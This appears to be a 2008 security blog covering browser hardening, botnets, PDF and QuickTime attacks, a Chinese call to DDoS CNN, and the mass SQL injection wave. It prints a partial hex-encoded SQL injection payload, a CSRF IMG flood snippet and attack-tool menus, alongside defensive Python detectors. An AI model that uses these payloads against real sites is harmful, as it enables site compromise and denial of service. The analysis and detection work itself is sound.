Wednesday

How to secure your browser




Even if you recognize and ignore phishing emails, statistically, sooner or later you will visit an infected website. Previous research has shown that 0.45% of all websites are infected (your mileage may vary). With all the recent drive-by infections, that percentage might have increased. The internet is becoming a bad neighborhood. Email attachments aren't the biggest concern for viruses anymore; it's your browser now. So let's see how to protect ourselves.

Some of my old tips:

  • Run the browser as a non-administrator account or within a sandbox (free tools such as AMUST Defender or Sandboxie).
  • Use a host-based firewall that blocks inbound and outbound connections per application.
  • Patch your system: not only the operating system and browser, but also plug-ins and non-browser applications. Several tools exist that make this assessment easier. One of these tools is the Secunia Software Inspector.
  • Disabling JavaScript might be another very effective method to stop attacks. Most attacks we observed did need JavaScript to be enabled. Disabling JavaScript, however, might not be feasible, as it would severely impact the functionality of many legitimate websites. Some tools address this problem by globally disabling JavaScript but selectively enabling it for certain trusted sites. NoScript for the Firefox browser is an example of such a tool.
  • Use OpenDNS, as it provides some anti-phishing protection.
  • Don't be mainstream: the tests we conducted show that a simple but effective way to remove yourself as a targeted user is to use a non-mainstream application, such as Opera. As mentioned above, despite the existence of vulnerabilities, this browser didn't seem to be a target.
Let me add the tips from TSSCI Security:
CERT has an excellent document on Securing your web browser! They cover IE, Firefox, and Safari: three secure references for the three most popular browsers.

However, as good as CERT's guide is, you won't want to miss our past blog posts on safe/secure browsing, which are stacking up like hot-cakes:

Out of interest, I wanted to have another look at some browser statistics. Diversity is good, and Firefox is still my favorite browser. Firefox made some good progress but has stagnated (or stabilized) for the last 6 months. Of course, Firefox 3 might tip the balance a little more. I have tested it and its rendering is really fast. I haven't switched completely since it's still a beta. Pick your favorite poison.

Browser share per month (Fx = Firefox, Moz = Mozilla, S = Safari, O = Opera):

2008        IE7     IE6     IE5     Fx      Moz     S       O
March       21.9%   30.1%   1.1%    37.0%   1.1%    2.1%    1.4%
February    21.5%   30.7%   1.3%    36.5%   1.2%    2.0%    1.4%
January     21.2%   32.0%   1.5%    36.4%   1.3%    1.9%    1.4%

2007        IE7     IE6     IE5     Fx      Moz     S       O
December    21.0%   33.2%   1.7%    36.3%   1.4%    1.7%    1.4%
November    20.8%   33.6%   1.6%    36.3%   1.2%    1.8%    1.6%
October     20.7%   34.5%   1.5%    36.0%   1.3%    1.7%    1.6%
September   20.8%   34.9%   1.5%    35.4%   1.2%    1.6%    1.5%

Germany caught spying on other countries with Trojans



Let's take a trip back in time. In September, Germany accused China of cyberespionage. Now it seems that Germany was also using Trojans to eavesdrop on the communications of other countries. Its excuse? The war on terror!

Eight months after the nation's chancellor accused China of information attacks, Germany now faces criticism over its intelligence agency's use of software designed to spy on other countries' officials.

The latest incident, which began in June 2006, involved Germany's intelligence agency -- the Bundesnachrichtendienst (BND) -- launching an information attack against the Ministry of Commerce and Industry of Afghanistan, ostensibly an ally, according to media reports. Using a Trojan horse, the intelligence agents were able to read an Afghan government official's e-mail, including his correspondence with a reporter working for the German news magazine Der Spiegel, and data stored on the compromised PC's hard drive. The German Constitution protects the secrecy of telecommunications, but BND's legal counsel concluded that, because the messages were stored communications, they did not fall under the constitutional protection, Der Spiegel reported.

The operation ended in November 2006, when a whistleblower sent a letter to his superiors warning of the surveillance, the magazine reported. In February 2008, an anonymous BND employee notified two members of Germany's parliament of the intelligence agency's wiretapping activities. The incident only recently came to light during a Parliament hearing two weeks ago.

Germany's Interior Minister Wolfgang Schaeuble raised the specter of terrorism during a TV interview to defend the cyber-espionage tactics as necessary. "It's about a few isolated cases," he said, according to an Associated Press report. (Source: Securityfocus)

The article from Der Spiegel mentions some interesting parts:
It all began in a small unit in the BND's Division 2. The department is responsible for "technical procurement" -- in other words, obtaining information with technical means, which mainly involves the wiretapping of telecommunications, called "signals intelligence" in industry jargon. In 2006, Division 2 consisted of 13 specialist departments and a management team (Department 20A), employing about 1,000 people. The departments are known by their German acronyms, like MOFA (mobile and operational telecommunications intelligence gathering), FAKT (cable telecommunications intelligence gathering) and OPUS (operational support and wiretapping technology).

In early June 2006, the OPUS team in department 26E launched an intelligence attack against Afghanistan. The details could have been taken from a Hollywood thriller, and the scope of the operation was far greater than has been revealed to date. According to the BND's secret allocation of responsibilities, OPUS is in charge of "technical and operational attacks on IT systems," a more or less accurate description of its agents' work.

So you see, China is not the only country with a cyber-intelligence division.


Podcast: AudioParasitics Episode 33 - Part 1 of 2 - Defcon's 'Race to Zero' contest



Episode 33 - Part 1 of 2 - Dave and Jim Discuss Defcon's upcoming 'Race to Zero' contest (Defcon 16), The McAfee S.P.A.M Experiment, and the 2008 RSA conference.

Podcast: Blue Box #78: Cisco IP phone vulnerabilities, WiFi handset insecurity, IETF security-related news, VoIP security news



A new Bluebox has been released:

Download the show here (MP3, 17MB) or subscribe to the RSS feed to download the show automatically.


Short Movie: When technology takes over our life

A short movie about what happens when you don't control your data anymore. A scary future. It makes you think about putting all functions onto one card (payment, identity, car access, house access, ...). It seems so convenient, but...

PS, the end is not suitable for young viewers.


Tuesday

WAFs, PCI and the United Nations SQL injection



Last week, the UN seemed to be among the websites falling victim to the SQL injection attack, and it wasn't their first time. The reason? They never fixed the code and just put a web application firewall in front of it:

One of my early Hackademix posts was about SQL injection vulnerabilities exploited to deface the United Nations main web site. In a later update I explained how, rather than fixing their holes properly, the U.N. technicians deployed a pretty useless Web Application Firewall, masking the most obvious attack surface but keeping their sites just as vulnerable as before.
...

The default search pattern of this tool is inurl:".asp" inurl:"a=": in English, “those web pages developed with Microsoft Active Server Pages technology and accepting query string parameters”. Unsurprisingly, this profile matches the original, still unpatched U.N. SQL injection; as I already said reporting the first accident, I believe crackers primarily target ASP sites (even though they are relatively few nowadays) because of the poor coding standards often shown by ASP coders, who usually have a Visual Basic desktop programming background and are less aware of web application security.

At any rate, some simple googling reveals that some U.N. sites are still infected, while UK Government sites have been “cleaned up”.
The sad truth, though, is that even those “clean” sites are still vulnerable, hence they could be reinfected at any time: some people just never learn… (Source: hackademix.net)


This reminded me of PCI requirement 6.6, which was published and gave rise to some heated discussions about WAFs. I guess a WAF can buy you some time, but it is not a miracle worker. Fix the code!!!


New Variant of Kraken bot on the loose



In the beginning of the month, there was a lot of discussion when a new botnet was discovered that was claimed to be bigger and more dangerous than Storm Worm: the Kraken botnet. But soon afterwards the discussion fell silent, as all attention went back to Storm Worm with its video codec spam wave. So, how is Kraken doing today? Quite well, it seems. Here is some news from Threatexpert.com:

A new variant of Kraken/Bobax bot, first seen in the wild on 14th April 2008, seems to be gaining a bit of power: over the last weekend, our ThreatExpert system has received around 50 unique samples of it, and we're still getting them at the same pace - 20-25 new samples a day.

...

In some way, we may call this new feature of the bot an "Artificial English Word Generator", which follows English grammar rules and produces words that look like most other words. For example, compare "confusulent" or "pritation" with something like "ktjptrca".

What is it for? Probably to evade SPAM filters, or any other algorithms that can distinguish a random word by locating weird or uncommon combinations of characters. If no rule or algorithm can be built to distinguish such a word, then it cannot be detected, and therefore, blocked.

The bot constructs an HTTP package with the encrypted contents that is MIME-encoded and is presented as a random MIME-type archive in the HTTP header.

Kraken/Bobax POSTs that HTTP package to its C&C servers (with the pseudo-random URLs), thus making it non-trivial to detect and block such traffic, as not much is left to "hook" in it.

...

As demonstrated above, the new factor of "randomness" in this bot makes it extremely dangerous, considering how serious its effort is in concealing its traffic in order to flow with no obstruction imposed by the firewalls.

The backdoor component is left intact in the new variant - its code was copy-and-pasted from the previous variant: the same commands, the same responses.

The SPAM engine and the email collector module are also identical to the previous variant.

Virustotal.com results are not very good considering only 9 out of 32 AV scanners (28.12%) can detect this threat, among which only two can actually identify this threat explicitly.

Read the full report.


Monday

Difference between ITIL v3 and ISO 20000



I know ITIL, but I hadn't heard about ISO 20000 before. So let's have a look at it and begin with the following:

Whitepaper: ITIL® V3 and ISO/IEC 20000 by Jenny Dugmore and Sharon Taylor


This outlines the differences between ITIL V3 and ISO/IEC 20000 from 'the perspective of each clause in the standard where the core 5 ITIL books either do not cover it or cover it differently. It does not cover changes that mean ITIL V3 is closer aligned to ISO/IEC 20000 than was ITIL V2. The table included within this white paper is an ISO/IEC 20000-1 centric document. It identifies clauses where there are notable differences between ISO/IEC 20000 and ITIL V3 that are not simply due to the different purposes of the two sets of documents.'

But isn't there any more information on ISO 20000 itself? Well, let's go to ISO 20000 Central:

As described on other pages of this site, ISO 20000 is the international standard for IT Service management.

However, ISO 20000 itself is part of a much bigger picture, in that it aligns with ITIL, the IT Infrastructure Library. This relationship is often illustrated via a diagram such as the one below:

Clearly, however, there is also a relationship with other management protocols and frameworks. This will be explored as additional features are added to this web portal.


Hack.lu 2008 conference coming on the 22nd - 24th of October



There were some rumors that there wouldn't be a new Hack.lu. But luckily, the rumors weren't true. I happened to see this "small" announcement on their website last week.

Announcement:
Yes, there will be a hack.lu 2008. The date will be 22-24 October in Luxembourg. Stay tuned, we are about to assemble the bits and pieces. The CfP will be sent out on 1st May. So prepare your submissions.

A three day conference in the center of Europe for bridging ethics and security in computer science.

Hack.lu is an open convention/conference where people can discuss computer security, privacy, information technology and its cultural/technical implications on society. The aim of the convention is to build a bridge between the various actors in the computer security world.

Marked in my calendar. Request to the manager underway.


Sunday

Targeted attacks using Acrobat's pdf and a little new trick



In the beginning of February, a critical security patch for Acrobat Reader was released. The vulnerability it fixes is now being actively used in targeted attacks. Here is an interesting analysis from SANS:

Ever since the end of March, beginning of April, the amount of samples seen in the wild has significantly increased. Interestingly enough, there is almost no "public, widespread" exploitation. All reports are limited to very specific, targeted attacks. However, due to the wide scope of these attacks, and the number of targets we know of, we feel a diary entry was in order. At this point in time, we are receiving more PDF samples from targeted attack victims per day than any other common file type (DOC, CHM, PPT). The threat agents, or attackers, are the same. They are just moving from other file types towards PDF, but are generally using the same control servers and similar backdoor families.

The files contain:
- an embedded trojan installer;
- a clean PDF file.

Once the file is opened in a vulnerable Acrobat Reader version, the backdoor will install, and the clean PDF file is opened in the user's browser. From a user experience, there are two possible methods of detection:

- If the file is opened in a patched Acrobat Reader, an error will be displayed that the file is corrupted;
- If the file is opened in a vulnerable Acrobat Reader, the user will see Acrobat Reader close and immediately reopen the valid PDF document.

Anti-virus detection of these samples is usually very low heuristically. Below are the detection results from a malicious PDF which had not been reported to an AV vendor yet. Note that these results vary per file.
The closing remarks were even more interesting, because they contain a countermeasure I wasn't aware of:
Acrobat Reader is proving to be an interesting target because users are not very much inclined to upgrade manually. The file format is relatively stable and users of Acrobat Reader 7 may not always feel a need to upgrade.

As such, we strongly recommend that you:

- Ensure your Acrobat Reader installations have been upgraded to version 8.1.2;
- Disable Javascript parsing through Edit>Preferences>Javascript, by disabling the 'Enable Acrobat JavaScript' option.
Read the full analysis @ SANS. Thank you Maarten.


Why right brain people will take over the world



I used to consider myself a 'leftie': a logical and analytical person with not much (need for) creativity. Most educational institutions have either exact-science or creative curricula, and the content is quite separated.
You seldom see any courses about creativity or creative thinking when following exact sciences, which is a pity. Even if you are not a natural talent in either discipline, with some 'training' you could master the basics. They are not (or shouldn't be) mutually exclusive. Even in IT or engineering, some creativity can help you think 'outside of the box' and come to solutions you wouldn't be able to find using only logic. I also consider creativity an essential skill for good presentations. This was my epiphany of the last year.

You could also consider 'hacking' a creative process: thinking about how to use technology in a way other than everyone else uses it. So start using that other half of your brain!!!

My friend Karim started an interesting discussion about "The Beginner's mind".

Most of us have lost these abilities when growing up. We've put the creative aspect away for only artists to use. Yet everyone should be the artist in their own line of work.

You may say that there is nothing creative about working in a regular business. But do you think that if there was no creativity within a business, that it could become innovative or differentiate itself within a given sector?

Within the zen teaching one often speaks of the “beginner’s mind” (or child’s mind). One who approaches life with a beginner’s mind is fresh, enthusiastic and open to a wide range of ideas. When one does not know what’s possible, one will be open to exploration/discovery. Unburdened by your fixed views/habits/…, one will see things more clearly.

Read his full post.

If you are interested in this topic, I can recommend the following book: A Whole New Mind: Why Right-Brainers Will Rule the Future.


The future belongs to a different kind of person with a different kind of mind: artists, inventors, storytellers, creative and holistic "right-brain" thinkers whose abilities mark the fault line between who gets ahead and who doesn't. Drawing on research from around the world, Pink outlines the six fundamentally human abilities that are absolute essentials for professional success and personal fulfillment, and reveals how to master them. A Whole New Mind takes readers to a daring new place, and a provocative and necessary new way of thinking about a future that's already here.

Updated with a part from Seth Godin: Really Bad PowerPoint Design:

Communication is the transfer of emotion.

Communication is about getting others to adopt your point of view, to help them understand why you're excited (or sad, or optimistic or whatever else you are). If all you want to do is create a file of facts and figures, then cancel the meeting and send in a report.

Our brains have two sides. The right side is emotional, musical and moody. The left side is focused on dexterity, facts and hard data. When you show up to give a presentation, people want to use both parts of their brain. So they use the right side to judge the way you talk, the way you dress and your body language. Often, people come to a conclusion about your presentation by the time you’re on the second slide. After that, it’s often too late for your bullet points to do you much good.

You can wreck a communication process with lousy logic or unsupported facts, but you can’t complete it without emotion. Logic is not enough.


Friday

Chinese attackers might have another go at CNN, another planned attack on the 25th 8pm (UPDATED)



Kudos to TheDarkVisitor for reporting this, even if it's not confirmed.

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issues regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don't forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online; they won't be able to withstand us.

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people. (TheDarkVisitor)

And the way they'll do it is very simple: by just asking people to surf to a website. Jeremiah was referencing this kind of attack just a few days ago, and this is the real-world example.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five,six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:
Yes. It loads an iframe: And then it reloads itself every five seconds:

(TheDarkVisitor)

I don't know what they are hoping to accomplish, as this attack can be easily avoided in the same way as before: filtering or blocking certain Chinese netblocks.

BUT if someone were to throw in a botnet or two, that is another matter. And it seems they have released the tools, just for the occasion: NetBot Attacker Anti-CNN Tool (Arbor Networks)

As I noted last night, another, third tool (that I know of) dedicated for Chinese who are upset and want to attack CNN has been released. The folks at Hackeroo have released a Netbot Attacker Anti-CNN version, free of charge, for folks to use. Normally Netbot Attacker is a commercial tool, but this is a focused version.

Netbot Attacker provides a simple Windows UI for controlling a botnet, reporting and managing the network, and commanding attacks. So far nothing special or new there. It ships as a simple RAR file with two pieces: an INI file (see below, partially edited and obscured) and a simple EXE.

...

A rough translation - provided with the bot - would be:

Common Attack:
SYN Flood ICMP Flood UDP Flood UDP Small TCP Flood TCP Mult-Connect
Web Attack :
NoCache Get Flood CC Attack Http GET Nothing
Speical Attack:
CQ Game Attack Route Attack Smart Auto Attack
Combine Attack:
SYN+UDP Flood IACMP +TCP Flood UDP Small+TCP Connect

Note that there’s no mention to the average user that they’ll be able to access your PC now that you’re helping the cause.

It is unclear to me how much this specific tool is used compared to the others. In the end, the effect is the same, however, which is to try and drive an adversary offline with a packet flood.

Read the full analysis from Jose Nazario here, including screenshots.

The attack might go through in the next hours. Time to keep an eye on those Netcraft statistics. More news to follow.

By the way, apparently there was a third victim in this whole discussion: Slideshare.net also suffered a major DDoS, peaking at 2.5 GBps, last week.


UPDATE (25/04/2008): Either the attack has yet to really start, or CNN is taking the attack really well. The funny thing is that, looking at the Netcraft statistics, we only see some performance drops measured from Italy. There were some spikes (response times) on that graph. During the last attack, we saw spikes on all of the graphs.





Followup on the 1.js sql injection wave



It seems that the number of infected pages has mounted up to 510,000 pages (Source: F-Secure). Looking at the Belgian pages, the count seems to have become 369 infected (injected) sites.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.

Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…

Which when decoded becomes:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains is inaccessible, but that could change. So if you're a firewall administrator we recommend you to block access to them. (Source: F-Secure)
Input validation, people!!! Check out the OWASP Top Ten. SQL injection is back in spot no. 2.
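As an added example (not from the post or from F-Secure's analysis), here is the defender's side of the request quoted above: a small Python check that pulls the hex literal out of a request's query string, decodes it as the UTF-16LE text that a SQL Server NVARCHAR CAST produces, and flags the DECLARE/CAST(0x...) shape shared by this wave and the still-unpatched UN site's attackers. The request line and log format are constructed; the hex is the prefix quoted above, cut at a whole character.

```python
import re
from urllib.parse import unquote

# Hex literal quoted in the F-Secure excerpt above, cut at a whole UTF-16 code
# unit (the post truncates the payload with "..." right after this point).
PAYLOAD_HEX = (
    "440045004300"
    "4C00410052004500200040005400200076006100720063006800610072"
    "00280032003500350029002C0040004300200076006100720063006800"
    "610072002800320035003500290020004400450043004C004100520045"
    "0020005400610062006C0065005F0043007500720073006F0072002000"
    "43005500520053004F005200200046004F0052002000730065006C0065"
    "0063007400200061002E006E0061006D0065002C0062002E006E006100"
    "6D0065002000660072006F006D0020007300790073006F0062006A0065"
    "00630074007300200061002C0073007900730063006F006C0075006D00"
    "6E00730020006200200077006800650072006500200061002E00690064"
    "003D0062002E0069006400200061006E006400200061002E0078007400"
    "7900700065003D00270075002700200061006E0064002000280062002E"
    "00780074007900700065003D003900390020006F007200200062002E00"
    "780074007900700065003D00330035002000"
)

# Constructed request lines (assumed IIS-style "METHOD target HTTP/x" form):
# an ASP page taking an "a=" query parameter, once with the injected prefix
# appended in the URL-encoded form shown above, once as a normal visit.
SAMPLE_REQUEST = (
    "GET /news/article.asp?a=123;DECLARE%20@S%20NVARCHAR(4000);"
    "SET%20@S=CAST(0x" + PAYLOAD_HEX + " HTTP/1.1"
)
BENIGN_REQUEST = "GET /news/article.asp?a=123 HTTP/1.1"

# The two fingerprints of this wave: a DECLARE of an (N)VARCHAR variable and
# a CAST of a hex literal, which is how the real SQL is smuggled past naive
# keyword filters (there is no readable SELECT or UPDATE in the URL itself).
MARKERS_RE = re.compile(r"\bDECLARE\s+@\w+\s+N?VARCHAR\s*\(\s*\d+\s*\)", re.IGNORECASE)
HEX_CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)


def query_string(request_line):
    """Return the URL-decoded query string of a request line ('' if none)."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else parts[0]
    _, _, qs = target.partition("?")
    # Decode %20 and friends so the SQL keywords become visible to the regexes.
    return unquote(qs)


def decode_hex_payload(hex_digits):
    """Decode a CAST(0x... AS NVARCHAR) literal back to text.

    NVARCHAR is UTF-16LE, so every character is two bytes (four hex digits);
    a literal cut mid-character is trimmed to the last whole code unit.
    """
    usable = hex_digits[: len(hex_digits) - (len(hex_digits) % 4)]
    return bytes.fromhex(usable).decode("utf-16-le", errors="replace")


def inspect_request(request_line):
    """Return (is_hex_cast_injection, decoded_sql) for one request line."""
    qs = query_string(request_line)
    match = HEX_CAST_RE.search(qs)
    if match is None or MARKERS_RE.search(qs) is None:
        return False, ""
    return True, decode_hex_payload(match.group(1))


if __name__ == "__main__":
    for line in (BENIGN_REQUEST, SAMPLE_REQUEST):
        flagged, sql = inspect_request(line)
        print("INJECTION" if flagged else "ok       ", line[:60])
        if flagged:
            print("  decodes to:", sql)
```

Matching this pattern in a WAF or log monitor only spots this one wave; the fix the post calls for is to stop concatenating the a= value into the query at all, so that it never reaches the SQL parser as code.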

UPDATE (25/04/2008): SANS ISC is also giving some more details:

The crew over at shadowserver has published additional information related to SQL injected sites. They included the botnet controller's IP address 61.188.39.214 and a content-based snort signature for the bot control traffic that is not IP dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313

They have hit city websites, commercial sites and even government websites. This type of injection pretty much nulls and voids the concept of "trusted website" or "safe sites".

The Register covered it, stating their search returned 173k injected results:
http://www.theregister.co.uk/2008/04/24/mass_web_attack/
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more than once.

Lou, a self-described "accidental techie", has been discussing it, as they have been reinjecting this into his database/website "every other day". http://www.experts-exchange.com/Database/MySQL/Q_23337211.html

Another Zero Day in Quicktime



Beware of opening QuickTime movies!!!

US-CERT is aware of a public report of a new vulnerability in Apple QuickTime. The report indicates that if a user opens a specially crafted QuickTime file, an attacker may be able to execute arbitrary code. This vulnerability may have several attack vectors, such as visiting a malicious or compromised website. US-CERT is currently investigating this report and will provide additional details as needed.

US-CERT encourages users to use caution when opening QuickTime files, and apply the best security practices described in the Securing Your Web Browser document, to help mitigate the risks. (Source: US CERT)
There is no patch as we speak, so be careful. How many more of these security holes will we see in QuickTime?

UPDATE: The (original) GNUCITIZEN article with a movie on the exploit.


Thursday

Airport Security: All your data are belong to us



If you recently took a plane from Schiphol airport (Amsterdam), it is possible that the data on your mobile phone, laptop, USB sticks or other media was copied and "searched". The reason: looking for the distribution of child porn. (Source: security.nl)

It was only a pilot project, set up because suspects are believed to transport the material physically out of fear of detection on the internet. Tourists who had been to Thailand, Brazil, Sri Lanka and Vietnam were especially under scrutiny.

The border police didn't say what the search criteria were, but they confirmed that laptops, digital cameras and CD-ROMs were inspected.

I already knew that they did these 'digital' searches at the US borders. It seems to be spreading to other countries now. At least they didn't use the terrorism wildcard.

I don't condone child porn at all, but this practice has consequences. I have signed NDAs with my clients and I have a contractual and legal obligation not to disclose their information. I probably cannot refuse these kinds of searches, since that would also put me between a rock and a hard place.

The only alternative is to travel only with a cleanly installed laptop and use an (SSL) VPN to access my data. But with the prices of hotspots (in hotels), that's a pricey way of working.

This is so easy to circumvent. Just solder a USB flash chip to the PCB of your laptop and make it look like a part of the laptop. It's of course not electronically connected, and I doubt that they will disassemble the laptop and inspect it. Afterwards, remove the chip and resolder it onto the pendrive PCB. Maybe not the best example, but these things are so small that they seem easy to hide.

Does your IT staff have spare laptops ready for your travelers? Do you have a security policy that takes this into account? These kinds of search practices have a major impact on the protection of our confidential information and the way our mobile users work.

Wanted: experts on security issues of OS virtualization technologies



ISSA-BE has received a request from Dr. Trimintzios from ENISA to support them in investigating security issues of OS virtualization technologies.

ENISA is planning to establish a Virtual Expert Group (no physical meetings required) to study the Security issues in Operating System Virtualisation Technologies. The work of the group is expected to result in a position paper which will be published by ENISA, while all the members selected for the group will be designated as co-authors.
The paper is aimed at end users of these technologies, policy and decision makers. I would like to ask you for your help in identifying experts for this new group.

Please inform anyone within or outside your organisation who has expertise on this topic and who would be interested in participating. Obviously, if you feel you have the relevant expertise, please propose yourself. The detailed Terms of Reference for the Virtual Group and the ENISA position paper on security issues in OS virtualization technologies are available here.

For applications and further information please contact Dr. Simone BALBONI. Please note that we expect the paper to make a considerable impact in the press.
So if you have some expertise in this area, any help would be appreciated.

I don't need a botnet, just me and some friends with CSDDoS



Jeremiah started a discussion about CSRF DDoS and why it could become a real threat.

It’s with this context in mind that I share my thoughts about DDoS attacks carried out by way of CSRF. Also, I take no credit for the novelty of this attack as it's been rumored around in various circles for years. I’m merely drawing attention to the issue. Here’s the basic exploit code that a bad guy would need:

<* IMG SRC=”http://victim/” >

Simple enough? All the bad guy needs to do is post the HTML snippet to a large number of public websites where other users would come in contact with it. These websites could be message boards, guest books, WebMail, blog comments, social networks, chat rooms, and so on. All the types of websites quite popular, free to sign-up, and easy to automate (save for CAPTCHA). The code instructs a user's browser to make an HTTP request to an arbitrary location (victim) invisibly and behind the scenes with connections originating from all over. This makes the attack difficult to stop and obviously the more frequented the websites are the more effective it is. (Source: Jeremiahgrossman)
Well, this might just be a theoretical attack, or is it? I remembered Dancho Danchev posting the following piece (about the CNN attack):
What if a simple script that is automatically refreshing CNN.com multiple times in several IFRAME windows gets embedded at thousands of sites, and then promoted at hundreds of forums, with a single line stating that - "If you're a patriot, forward this to all your friends"? Now, what if this gets coordinated to happen at a particular moment in time? This is perhaps the most realistic scenario to what exactly happened with CNN.com, and data speaks for itself, in fact I can easily state that the bandwidth generated by this massive PSYOPs campaign is greater than the one used by a botnet that's also been DDoS-ing CNN.com.

All of these sites are basically refreshing CNN.com every couple of seconds, thereby wasting the site's bandwidth. The only flaw of this attack approach compared to a botnet is that all the participating hosts are Chinese, and therefore, as NetCraft pointed out, CNN blocked access to certain countries, take these countries as China for instance. (Source: ddanchev)
CSDDoS is just a term suggested in one of the comments of Jeremiah's post. Great, another IT acronym for the dictionary! ;-)

Reading the text above, the attack doesn't sound so theoretical anymore.

So, how long before blocking large netblocks like China won't work anymore?

Another interesting read is the Puppetnets (Misusing Web Browsers as a Distributed Attack Infrastructure) paper from "Systems and Security Department, Institute for Infocomm Research, Singapore":

ABSTRACT
Most of the recent work on Web security focuses on preventing attacks that directly harm the browser’s host machine and user. In this paper we attempt to quantify the threat of browsers being indirectly misused for attacking third parties.
Specifically, we look at how the existing Web infrastructure (e.g., the languages, protocols, and security policies) can be exploited by malicious Web sites to remotely instruct browsers to orchestrate actions including denial of service attacks, worm propagation and reconnaissance scans. We show that, depending mostly on the popularity of a malicious Web site and user browsing patterns, attackers are able to create powerful botnet-like infrastructures that can cause significant damage. We explore the effectiveness of countermeasures including anomaly detection and more fine-grained browser security policies.
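As an added example (not code from Jeremiah's, Danchev's or the Puppetnets authors' posts), this is how the victim site's operator could pick a planted IMG/IFRAME flood out of an Apache-style access log: one external Referer sends many distinct client IPs, and each of those clients fetches a single URL and none of the page's own assets, because the response is never rendered. The log lines, host names and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache/nginx "combined" log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_hotlink_floods(lines, own_host, min_ips=5, single_fetch_ratio=0.8):
    """Return {referer_host: distinct_client_ips} for external referers whose
    visitors behave like a planted <img>/<iframe> rather than real readers.

    A browser loading the victim URL from an <img> tag never renders the
    response, so that client requests exactly one path and none of the page's
    stylesheets, scripts or images.  A genuine inbound link is followed by
    asset requests from the same client.
    """
    ips_by_referer = defaultdict(set)   # external referer host -> client IPs
    paths_by_ip = defaultdict(set)      # client IP -> every path it requested
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        paths_by_ip[rec["ip"]].add(rec["path"])
        ref_host = urlsplit(rec["referer"]).hostname
        if ref_host and ref_host != own_host:
            ips_by_referer[ref_host].add(rec["ip"])

    flagged = {}
    for ref_host, ips in ips_by_referer.items():
        if len(ips) < min_ips:
            continue                     # too few clients to call it a flood
        single_fetchers = sum(1 for ip in ips if len(paths_by_ip[ip]) == 1)
        if single_fetchers / len(ips) >= single_fetch_ratio:
            flagged[ref_host] = len(ips)
    return flagged


# Constructed sample log (hosts are placeholders, not real sites): six forum
# readers whose browsers each fetched "/" once because of a planted IMG tag,
# and one genuine visitor from a search engine who also loads the stylesheet.
SAMPLE_LOG = [
    '10.0.0.%d - - [20/Apr/2008:10:00:0%d +0200] "GET / HTTP/1.1" 200 5120 '
    '"http://forum.example/thread/42" "Mozilla/5.0"' % (n, n) for n in range(1, 7)
] + [
    '192.0.2.7 - - [20/Apr/2008:10:00:08 +0200] "GET / HTTP/1.1" 200 5120 '
    '"http://search.example/?q=victim" "Mozilla/5.0"',
    '192.0.2.7 - - [20/Apr/2008:10:00:09 +0200] "GET /style.css HTTP/1.1" 200 800 '
    '"http://victim.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_hotlink_floods(SAMPLE_LOG, "victim.example"))  # {'forum.example': 6}
```

The same signature applies to Danchev's IFRAME-refresh variant; only the per-client request rate is higher, so a time window on top of this per-referer grouping is the natural next step.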

First batch of Shmoocon 2008 presentations online



